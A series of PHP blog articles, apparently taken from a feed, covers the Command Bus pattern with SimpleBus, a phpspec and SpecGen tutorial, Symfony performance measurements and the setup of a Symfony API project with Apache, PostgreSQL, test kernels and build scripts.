Since it allows us to choose how the Command Bus will find the Command Handler, we have to set it up:
<?php
use SimpleBus\Message\Bus\Middleware\MessageBusSupportingMiddleware;
use SimpleBus\Message\CallableResolver\CallableMap;
use SimpleBus\Message\CallableResolver\ServiceLocatorAwareCallableResolver;
use SimpleBus\Message\Handler\DelegatesToMessageHandlerMiddleware;
use SimpleBus\Message\Handler\Resolver\NameBasedMessageHandlerResolver;
use SimpleBus\Message\Name\ClassBasedNameResolver;
require __DIR__.'/vendor/autoload.php';
$commandHandlerMap = new CallableMap(array(
'Vendor\Project\Member\RegisterMember' => array('register_member_handler', 'handle'),
), new ServiceLocatorAwareCallableResolver(function ($serviceId) {
if ('register_member_handler' === $serviceId) {
return new Vendor\Project\Member\RegisterMemberHandler();
}
}));
$commandBus = new MessageBusSupportingMiddleware();
$commandBus->appendMiddleware(new DelegatesToMessageHandlerMiddleware(new NameBasedMessageHandlerResolver(
new ClassBasedNameResolver(),
$commandHandlerMap
)));
This create a Command Bus that will use the given Command's Fully Qualified ClassName (FQCN, the class name with its full namespace) to call the associated Command Handler in the map. Also, the Command Handler will only be created if it is used!
This configuration looks a bit scary, but thankfully if we use Symfony we can just install the bundle:
composer require simple-bus/symfony-bridge:^3.0
# Don't forget to register `SimpleBus\SymfonyBridge\SimpleBusCommandBusBundle` in `AppKernel`
Then we just have to use the command_bus service. To register Command Handler, we
need to tag service definitions as follow:
services:
register_member_handler:
class: Vendor\Project\Member\RegisterMemberHandler
tags:
- { name: command_handler, handles: Vendor\Project\Member\RegisterMember }
Now that the configuration is settled, here's a usage example:
$username = isset($argv[1]) ? $argv[1] : null;
$commandBus->handle(new RegisterMember($username));
The command would look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMember
{
public $username;
public function __construct($username)
{
if (null === $username) {
throw new \InvalidArgumentException('Missing required "username" parameter');
}
$this->username = $username;
}
}
Note: Commands validate simple input logic (required parameters, parameter type, etc).
The Command Handler could look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMember
{
private $memberRepository;
public function __construct(MemberRespository $memberRepository)
{
$this->memberRepository = $memberRepository;
}
public function handle(RegisterMember $registerMember)
{
if ($memberRepository->has($registerMember->username)) {
throw new \DomainException(sprintf('Given username "%s" already exists, and duplicates are not allowed', $registerMember->username));
}
$memberRepository->register($registerMember);
}
}
The Command Handler validates more complex logic (member username duplication, etc).
Here's a nice reference about command validation: Form, Command, and Model Validation.
Here are some personal tips!
We can reuse Command Handlers by injecting them into other Command Handlers (don't inject the Command Bus in a Command Handler).
Command Handlers were not meant to return anything (think of asynchrone messages). But this might not always be pragmatic: in this case we can store a return value in the Command.
We've talked about the Command part in CQRS, what about the Query part? I've experimented a bit with a "Query Bus", but in the end I've settled down with a Search Engine class, to which a Criteria is given.
Remember when people said that controllers shouldn't have any logic in it? With the Command Bus pattern this becomes possible. It also makes this kind of logic reusable and testable.
Simple Bus is a nice library for this: it doesn't get in our way. For more information about it, read the series of articles published for its first release (caution: the public API changed a lot since): A wave of command buses.
An alternative in the PHP world would be Tactician.
Here's also some nice slides by Richard Miller about CQRS: Avoiding the Mud.
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
phpspec is a highly opinionated unit test framework: it was conceived to practice specBDD (test method names should be sentences) and Mockist TDD (collaborators should always be mocked) and tries to enforce some testing practices (see Marcello Duarte's top 10 favourite phpspec limitations).
The first version was created by Pádraic Brady as a port of rspec, but Marcello Duarte and Konstantin Kudryashov took over and released a second version which added code generation. Ciaran McNulty then took the lead from v2.1 and added many features like collaborator generation, better exception specification and currently for version 2.3 better constructor specification.
Let's have a look at how phpspec works. For this we'll need to have a project configured with
Composer. Here's the composer.json file:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
We can install phpspec with the following:
composer require --dev phpspec/phpspec:^2.2
Let's say we want to create a class that edits text files. We can call this class
TextEditor:
phpspec describe 'Vendor\Project\TextEditor'
Tip: make your vendor's binaries available by adding
vendor/binto your$PATH.export PATH="vendor/bin:$PATH".
We should now have the spec/Vendor/Project/TextEditorSpec.php file, bootstraped
for us by phpspec:
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class TextEditorSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\TextEditor');
}
}
Note: this test can only be used to test the
TextEditorclass.
Our first use case will be about creating a file if it doesn't already exist.
Those are filesystem operations, so we decide to delegate the actual logic to a
Filesystem class (we'll create it later).
So our first step will be to create a set up method (it will be executed before every test method) that initializes our object:
<?php
// File: spec/Vendor/Project/TextEditorSpec.php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
}
Arguments passed to test methods are actually test doubles (phpspec uses the typehint to know what to mock).
Now we can create the actual test method:
<?php
// File: spec/Vendor/Project/TextEditorSpec.php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
function it_can_force_file_creation_if_it_does_not_already_exists(File $file, Filesystem $filesystem)
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
This is roughly the equivalent of the following with PHPUnit:
<?php
namespace Vendor\Project\Tests;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorTest extends PHPUnit_Framewor_TestCase
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
private $prophet;
private $filesystem;
private $textEditor;
protected function setUp()
{
$this->prophet = new \Prophecy\Prophet();
$this->filesystem = $this->prophet->prophesize('Vendor\Project\Service\Filesystem');
$this->textEditor = new TextEditor($filesystem->reveal());
}
protected function tearDown()
{
$this->prophet->checkPredictions();
}
/**
* @test
*/
public function it_can_force_file_creation_if_it_does_not_already_exists()
{
$file = $this->prophet->prophesize('Vendor\Project\File');
$this->filesystem->exists(self::FILENAME)->willReturn(false);
$this->filesystem->create(self::FILENAME)->willReturn($file);
self::assertSame($file, $this->textEditor->open(self::FILENAME, self::FORCE_FILE_CREATION));
}
}
Note: We tried to make the test method as descriptive as possible (e.g. not
testOpen()). This is the whole point of specBDD (specification Behavior Driven Development).
phpspec uses the mocking library prophecy (also available in PHPUnit since version 4.4),
which tries to be as less verbose as possible: to describe interractions, test doubles
can almost be used as the actual object, except we need to add a ->willreturn() or
->shouldBeCalled() call afterwards.
Note: By mocking all collaborators, we are forced to think how our object interracts with them. This is the whole point of Mockist TDD (Mockist Test Driven Development).
Now that we have a test, we are going to execute the test suite (as advocated by TDD):
phpspec run
It will ask the following 7 questions:
Vendor\Project\Service\Filesystem for you?Vendor\Project\File for you?Vendor\Project\Service\Filesystem::exists() for you?Vendor\Project\Service\Filesystem::create() for you?Vendor\Project\TextEditor for you?Vendor\Project\TextEditor::__construct() for you?Vendor\Project\TextEditor::open() for you?By accepting everytime, phpspec will bootstrap the following
src/Vendor/Project/Vendor/TextEditor.php file:
<?php
namespace Vendor\Project;
class TextEditor
{
public function __construct($argument1)
{
// TODO: write logic here
}
public function open($argument1, $argument2)
{
// TODO: write logic here
}
}
In our specification, we make use of non existing class (File and Filesystem)
but phpspec also bootstraped them for us, for example src/Vendor/Project/Vendor/Filesystem.php:
<?php
namespace Vendor\Project\Service;
interface Filesystem
{
public function exists($argument1);
public function create($argument1);
}
This is extremely usefull to kickstart our TDD cycle!
Once the code is written, we'll execute the test suite again, and then we'll add more use cases to the test class (e.g. what happens if the file already exists?).
For further usage example, have a look at: articles tagged with phpspec.
phpspec's code generator is a big part of its value, but it could do more for us. Hence the SpecGen extension!
We can install it as follow:
composer require --dev memio/spec-gen:^0.4
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
If we remove the code generated by phpspec:
rm src/Vendor/Project/TextEditor.php
And re-run the tests:
phpspec run
Then the generated class will be:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open($argument1, $argument2)
{
}
}
Test are more than simple regression checks: when a class is hard to test it indicates that it does too many things or is too coupled.
They can also be used as a design tool: in our test method we can define exactly how we would like to use the future object. We can even decide on the go that some logic could be done by collaborators that don't exist yet and start defining how we like to interract with them.
This is what Emergent Design is all about: the design emerges on the go from the tests. Then they stop being simple tests, they become specifications: a live documentation of your code, which never become out of date.
Here are some personal tips:
willReturn if you need the returned value of a collaborator (official name: Mock)shouldBeCalled to check that a collaborator is called (official name: Stub)willReturn and shouldBeCalled, you have to pick one!it_is_a_ test method with a shouldImplement check when testing implementationsshouldBe matcher is usually the only one you needIf the tested object (official name: System Under Test, SUT) creates a value object and passes it to a collaborator you have two choices:
Argument::type('MyValueObject')phpspec is a nice unit testing framework, with many advantages:
Give it a try!
]]>In this article we'll see a series of optimizations with their impact. Then we'll conclude that Caching is actually better, let's see those figures!
The application is built with the Symfony Standard Edition and Doctrine ORM's QueryBuilder.
Composer's configuration has been tweaked to use PSR-4 and to not autoload tests.
Also Composer has been run with the --optimize-autoloader option.
Tests are done using ab (with 10 concurrent clients for 10 seconds), on a different server than the application's one.
Also, we're using PHP 5.5 and Symfony 2.7.
The application would initially serve: 22 requests / seconds.
By removing unused dependencies, we get 23 requests / seconds.
Note
Removed:
- AsseticBundle
- SensioDistributionBundle (only from
AppKernel, the dependency is kept to generateapp/bootstrap.php.cache)- SensioGeneratorBundle
- SwiftmailerBundle
- TwigBundle
- WebProfilerBundle
Also, the following components have been disabled:
- Form
- Validation
By switching from Doctrine ORM's Query Builder to Doctrine DBAL's one: 28 requests / seconds.
By adding classes to compile: 29 requests / seconds.
By defining controllers as services: 30 requests / seconds.
This sums up to an increase of 36%.
By setting a 10 seconds HTTP cache (using FOSCacheBundle), on top of the previous optimizations , we get 160 requests / seconds (an increase of 430%).
And that's by using Symfony's built in reverse proxy, imagine what we could get with varnish!
While optimizations are fun, they don't bring much value. The main bottlenecks are usually the autoloading, database/network transactions and the number of functions called.
On the other hand, using a reverse proxy is quite simple and does pay off!
]]>Our goal in this post is to bootstrap an application to then create a search endpoint for items. We've decided to use Symfony for a single reason: our company Acme used it since the begining and the API developers team has Symfony and PHP skills.
Note: Most frameworks have a good community support, a strong documentation, similar features and many developers available on the market. We'll see the importance of a framework performances in the following articles, but the point here is that the choice should mainly rely on skills we have internally (and the ones we can acquire).
The first step is to use Composer:
composer create-project symfony/framework-standard-edition items
This will create a directory structure for our project, download a set of third
party libraries and ask us to set a bunch of configuration parameters. In this
series we'll use a Postgres database, so we need to edit app/config/config.yml:
# ...
# Doctrine Configuration
doctrine:
dbal:
driver: pdo_pgsql
# ...
Once finished we'll save our work using Git:
cd items
git init
git add -A
git ci -m 'Created a standard Symfony application'
Note: We can also use the Symfony Installer to create new projects.
For the same reason we chose Symfony we've decided to use Apache for our web servers (it's the one used for all previous projects).
Note: By providing Nginx trainings and recruiting devops used to, it Acme could change its technology stack. The only rule when switching to another technology is to stick to it in order to avoid having too many different technologies.
We need to create a virtual host first by creating the /etc/apache2/sites-available/items.conf
file:
<VirtualHost *:80>
ServerName items.local
DocumentRoot /home/foobar/items/web
ErrorLog "/home/foobar/items/app/logs/apache_errors.log"
CustomLog "/home/foobar/items/app/logs/apache_accesses.log" common
<Directory /home/foobar/items/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
Order allow,deny
allow from all
</Directory>
</VirtualHost>
Apache will require access to the logs and cache directories, as well as our user.
The easiest way to avoid permission issues is to change Apache's user and group
to ours in /etc/apache2/envvars:
export APACHE_RUN_USER=foobar
export APACHE_RUN_GROUP=foobar
We'll aslo need to add the hostname to our /etc/hosts file:
echo '127.0.0.1 items.local' | sudo tee -a /etc/hosts
Finally we have to enable the website and reload Apache to take the configuration into account:
sudo a2ensite items
sudo service apache2 reload
We now should be able to see the message "Homepage" when browsing http://items.local/app_dev.php/app/example
A nice tweak to do is to move tests in a separate directory, allowing Composer to only
autoload test class in development environments. This can be done by changing composer.json
as follow:
{
"name": "acme/items",
"license": "private",
"type": "project",
"description": "Specific APIs for items",
"autoload": {
"psr-4": { "AppBundle\\": "src/AppBundle" }
},
"autoload-dev": {
"psr-4": { "AppBundle\\Tests\\": "tests/" }
},
"require": {
"php": ">=5.3.3",
"symfony/symfony": "~2.7@beta",
"doctrine/orm": "~2.2,>=2.2.3,<2.5",
"doctrine/dbal": "<2.5",
"doctrine/doctrine-bundle": "~1.4",
"symfony/assetic-bundle": "~2.3",
"symfony/swiftmailer-bundle": "~2.3",
"symfony/monolog-bundle": "~2.4",
"sensio/distribution-bundle": "~3.0,>=3.0.12",
"sensio/framework-extra-bundle": "~3.0,>=3.0.2",
"incenteev/composer-parameter-handler": "~2.0"
},
"require-dev": {
"sensio/generator-bundle": "~2.3"
},
"scripts": {
"post-install-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::prepareDeploymentTarget"
],
"post-update-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::prepareDeploymentTarget"
]
},
"extra": {
"symfony-app-dir": "app",
"symfony-web-dir": "web",
"symfony-assets-install": "relative",
"incenteev-parameters": {
"file": "app/config/parameters.yml"
}
}
}
Since we've decided to move vendor binaries back to vendor/bin, we can un-ignore
the bin directory by editing .gitignore:
/web/bundles/
/app/bootstrap.php.cache
/app/cache/*
/app/config/parameters.yml
/app/logs/*
!app/cache/.gitkeep
!app/logs/.gitkeep
/app/phpunit.xml
/build/
/vendor/
/composer.phar
To make it official, we need to run the following commands:
rm -rf bin
composer update
Note: In production, we'll need to run
composer install --no-dev --optimize-autoloader
Our system/functional tests will involve database queries which can make the test suite
unreliable. To fix this, we'll create a "middleware" that wraps our AppKernel in a
database transaction and rolls it back after each requests:
To do so, we can create the following app/RollbackKernel.php:
<?php
// File: app/RollbackKernel.php
use Doctrine\DBAL\Connection;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpKernel\HttpKernelInterface;
class RollbackKernel implements HttpKernelInterface
{
private $app;
private $connection;
public function __construct(HttpKernelInterface $app, Connection $connection)
{
$this->app = $app;
$this->connection = $connection;
}
public static function make()
{
$kernel = new \AppKernel('test', false);
$kernel->boot();
$connection = $kernel->getContainer()->get('doctrine.dbal.default_connection');
return new self($kernel, $connection);
}
public function handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true)
{
$this->connection->beginTransaction();
$response = $this->app->handle($request, $type, $catch);
$this->connection->rollback();
return $response;
}
}
To be able to use RollbackKernel in our tests we need to make it available by
creating the following app/bootstrap_test.php:
<?php
// File: app/bootstrap_test.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
require __DIR__.'/RollBackKernel.php';
Then we can configure PHPUnit to use it by editing app/phpunit.xml.dist:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="bootstrap_test.php">
<testsuites>
<testsuite name="Functional Tests">
<directory>../tests</directory>
</testsuite>
</testsuites>
</phpunit>
Finally we'll install phpspec with SpecGen for our unit tests:
composer require --dev phpunit/phpunit:~4.6 phpspec/phpspec:~2.2 memio/spec-gen:~0.3
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
And now we're ready to test our application! Let's save our work:
git add -A
git commit -m 'Prepared application for tests'
There's 3 common tasks we'll be doing as developers with our application:
In order to automate those in a simple way, we've decided to create 3 scripts:
bin/build.sh, bin/deploy.sh and bin/test.sh, but for this series we'll only
take care of build and test.
The build steps should reinitialize the database and Symfony's cache, for this we'll need Doctrine Fixtures and Doctrine Migrations:
composer require doctrine/doctrine-fixtures-bundle:~2.2
composer require doctrine/migrations:~1.0@alpha
composer require doctrine/doctrine-migrations-bundle:~1.0
Then we have to register them in app/AppKernel.php:
<?php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\SwiftmailerBundle\SwiftmailerBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
new AppBundle\AppBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Doctrine\Bundle\FixturesBundle\DoctrineFixturesBundle();
$bundles[] = new Doctrine\Bundle\MigrationsBundle\DoctrineMigrationsBundle();
$bundles[] = new Symfony\Bundle\DebugBundle\DebugBundle();
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load($this->getRootDir().'/config/config_'.$this->getEnvironment().'.yml');
}
}
Now we can write the following bin/build.sh script:
#!/usr/bin/env sh
echo ''
echo '// Building development environment'
rm -rf app/cache/* app/logs/*
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --quiet doctrine:database:drop --force > /dev/null 2>&1
php app/console --quiet doctrine:database:create
php app/console --no-interaction --quiet doctrine:migrations:migrate
php app/console --no-interaction --quiet doctrine:fixtures:load --fixtures=src
echo ''
echo ' [OK] Development environment built'
echo ''
The test steps should be similar, in addition they will run the test suites and check for coding standards. We can install PHP CS Fixer for this:
composer require --dev fabpot/php-cs-fixer:~1.6
Here's the bin/test.sh script:
#!/usr/bin/env sh
echo ''
echo '// Building test environment'
rm -rf app/cache/test app/logs/*test.log
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --env=test --quiet cache:clear
php app/console --env=test --no-debug --quiet doctrine:database:drop --force > /dev/null 2>&1
php app/console --env=test --no-debug --quiet doctrine:database:create
php app/console --env=test --no-debug --no-interaction --quiet doctrine:migrations:migrate
php app/console --env=test --no-debug --no-interaction --quiet doctrine:fixtures:load --fixtures=src
echo ''
echo ' [OK] Test environment built'
echo ''
vendor/bin/phpunit -c app && vendor/bin/phpspec --no-interaction run --format=dot && vendor/bin/php-cs-fixer fix --dry-run --config=sf23 .
With this we can start the tickets assigned to us, we can commit the changes:
chmod +x bin/*.sh
git add -A
git commit -m 'Created build and test scripts'
Acme's technology stack is composed of Apache2, PostgreSQL, Symfony, PHPUnit and phpspec. In order to ake sure that anyone in the team or any new comers can maintain this new application in the future, we've chosen to stay consistent with the rest.
In the next article, we'll create the search items endpoint in a pragmatic way.
]]>Optimizing applications has an impact over maintenance, and making it harder to change right from the begining might not be the best option. However when the need of performance actually arises, we need to tackle it.
This series of articles is about this specific moment, and how to tackle it in a pragmatic way.
Spoiler Alert: It will feature a section where we optimize our application step by step, with a monitoring of the impact on performance. We'll see that those don't make a big difference, which is why those concerns shouldn't be addressed from day 1.
First, let's have a look at the big picture. Please note that the approach we use here is only one amongst many (every need is different, it might not be the best in every situations).
For our examples, we'll pretend to be the Acme Company which powers half the planet in almost every aspect of our lives. Performance isn't just a concern, it has become a reality.
Note: Those examples are all made up, but they're based on real experience.
We've analysed our market and we'd like to have the following new feature:
As a customer, I'd like to buy an item
During a meeting, we've come up with the following example:
Given a "fruit" category
When I pick a "banana"
Then it should be ordered
In the first days of Acme, we only had a few developers which were full stack. It worked quite well but we've grown so much that we had to recruit more specialized profiles with a frontend team and an API one: it allowed us to parallelize the work.
Frontend applications that live in the customer's browser have been chosen because:
In the early days of Acme there was a single big application, but with the number of customer growing and asking features specific to their need, it failed us hard costing us Money, Customers and Developers. Now each frontend applications talk to a dedicated API.
The dedicated APIs mix and match data coming from another layer of specific APIs. Those basically provide Create Read Update Delete and Search (CRUDS) access to their own data storage.
Note: We've decided to have two layers of APIs in order to avoid mixing features specific to a customer in an endpoint used by everyone.
From the Use Stories, we've identified two types of data: item related ones
and order related one.
We've decided to create the following applications:
acme/order-items-front, the frontend applicationacme/order-items-api the dedicated APIacme/items, an API specific to the item and item_category tablesacme/orders, an API specific to the order tableIn this series, we'll focus on the creation of the Search endpoint in acme/items.
The Search endpoint should allow:
page and per_page parameterssort parameterIn this series, we'll focus on paginating items.
Here's a valid Request sample:
GET /v1/items?page=2&per_page=1 HTTP/1.1
It should return a Response similar to:
HTTP/1.1 200 OK
Content-Type: application/json
{"data":[{"id":42,"name":"banana","category_id":23}],"page":{"current_page":2,"per_page":1,"total_elements":2,"total_pages":2}}
Our Acme mega corporation needs a new feature and we've decided to implement it by creating a frontend, its dedicated API which mix and match data coming from two new specific APIs.
The choice of this architecture has been made because it solved issues encountered in Acme's past, when we had a single big application.
In the next article we'll bootstrap a Symfony application to create an endpoint to search for items.
In the mean time if you're interrested in creating APIs in a pragmatic way you can read the following article. If you're wondering why Acme didn't use this approach from the begining you might want to read the following article.
]]>TL;DR: SpecGen v0.3 inserts a property for each constructor argument.
SpecGen is a phpspec extension which enhance its code generator. With the latest release, v0.3, we get the following features:
argument)$argument1, $argument2)Here's a simple example to demonstrate how helpful it can be.
First of all, we need to set up a project with Composer.
Let's write the following composer.json:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
Then we can install phpspec with SpecGen by running those commands:
composer require --dev phpspec/phpspec:~2.2
composer require --dev memio/spec-gen:~0.3
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
In our example, we'll specify a TextEditor service, it should be able to
create new files by relying on Filesystem, another service.
This can be done as follow:
phpspec describe 'Vendor\Project\TextEditor'
````
> **Tip**: make your vendor's binaries available by adding `vendor/bin` to your `$PATH`.
> `export PATH="vendor/bin:$PATH"`.
This should generate a `spec\Vendor\Project\TextEditorSpec.php` file:
```php
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class TextEditorSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\TextEditor');
}
}
It needs to be edited to fit our needs:
<?php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
function it_creates_new_files(File $file, Filesystem $filesystem)
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
The Test Driven Development cycle advises us to run the test suite now:
phpspec run
This will bootstrap the following code:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open($argument1, $argument2)
{
}
}
It created a filesystem property to mirror the constructor arguments. Neat!
In our example phpspec also generated the collaborators (File and Filesystem).
These don't beneficiate from SpecGen help yet, so the next release (v0.4) will
probably be about using it for collaborators.
Other features that could be implemented would be PHPdoc generation, or avoiding the
Interface / Abstract suffix/prefix in interface and abstract object argument names.
]]>Reference: see the phpspec reference article
TL;DR: SpecGen v0.2 inserts use statements.
SpecGen v0.2 has been released, it introduces a small change: use statement insertion.
Let's go back to the sources of the example used in the previous article and clean it a little bit:
rm -rf src
Given the following specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Message\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Message\Response');
}
}
When we run the test suite:
phpspec run
Then we should get the following file, with a use statement:
<?php
namespace Vendor\Project;
use Vendor\Project\Message\Request;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
Given the following new step in our specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Message\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Message\Response');
}
function it_supports_request(Request $request)
{
$this->supports($request)->shouldBe(true);
}
}
When we run the test suite:
phpspec run
Then we should get the following file, without new use statements:
<?php
namespace Vendor\Project;
use Vendor\Project\Message\Request;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
public function supports(Request $request)
{
}
}
Let's clear everything:
rm -rf src
Given the following specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Response');
}
}
Note:
RequestandRequestHandlerare both in the same namespace.
When we run the test suite:
phpspec run
Then we should get the following, without any use statements:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
This small feature was the occasion to refactor SpecGen a bit! This resulted in the
introduction of CodeEditor, a facade for a home made CommandBus and for
Redaktilo's Editor.
With these, the code to generate a method and insert a use statement looks like this:
$file = $this->codeEditor->open($fileName);
$this->codeEditor->handle(new InsertUseStatements($file, $fullyQualifiedNames));
$this->codeEditor->handle(new InsertMethod($file, $method));
$this->codeEditor->save($file);
While some improvements can still be done (use statements in alphabetical order, typehint interfaces only), the version 0.3 will mainly be about the introduction of a new generator: insertion of properties when the method is a constructor.
Stay tuned!
]]>Reference: see the phpspec reference article
TL;DR: SpecGen is a phpspec extension that improves its code generator. Currently available: type hinted method arguments.
With Memio v1.0 released, it is now possible to create powerful code generators without re-inventing the wheel. SpecGen is the first project to use this library, let's see what it can do for us.
First of all we'll talk about phpspec, which is an exciting project that provides many benefits:
Note: See My top 10 favourite phpsepc limitations.
It makes Test Driven Development cycles even more meaningful:
phpspec's code generator is a big part of its value. Let's see if we can improve it.
Let's have a look at how phpspec works. For this we'll need to have a project configured with Composer:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
We can install phpspec with the following:
composer require --dev phpspec/phpspec:~2.2
Let's say we want to create a class that handles requests, conforming to the HTTP protocol
(take a Request, return a Response). We can call this class RequestHandler:
phpspec describe 'Vendor\Project\RequestHandler'
Tip: make your vendor's binaries available by adding
vendor/binto your$PATH.export PATH="vendor/bin:$PATH".
We should now have the spec/Vendor/Project/RequestHandlerSpec.php file, bootstraped
for us by phpspec:
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class RequestHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\RequestHandler');
}
}
We can directly start by writing our first specification (test method) in it:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_arequest_and_returns_a_response(Request $request)
{
$this->handle($request)->shouldHaveType('Vendor\Project\Response');
}
}
Note: We tried to make the test method as descriptive as possible (e.g. not
testHandler()). This is the whole point of specBDD (specification Behavior Driven Development).
With this we can start to boostrap the code by simply running the test suite:
phpspec run
It will ask the following 3 questions:
